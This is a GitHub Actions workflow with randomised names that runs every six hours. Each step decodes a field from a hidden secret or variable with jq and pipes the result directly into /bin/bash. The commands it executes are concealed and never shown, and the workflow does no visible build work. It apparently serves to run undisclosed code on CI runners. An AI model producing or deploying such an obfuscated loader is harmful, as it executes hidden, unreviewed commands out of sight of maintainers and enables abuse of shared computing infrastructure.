name: kongxianqi3178
on:
  workflow_dispatch:
  schedule:
    - cron: '45 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kongxianqi3178
        env:
          zjai992: ${{ secrets.zjai992 }}
        run: |
          echo $zjai992 | jq -r .sar85 | /bin/bash
          echo $cozr1167 | jq -r .onfy106 | /bin/bash
          echo $fye25629 | jq -r .pulrz38 | /bin/bash
          echo $yn529 | jq -r .ollgz78442 | /bin/bash
          echo $uwx5042 | jq -r .w55 | /bin/bash
          echo $n82 | jq -r .u7 | /bin/bash
          echo $zzy27345 | jq -r .sdgmj91919 | /bin/bash

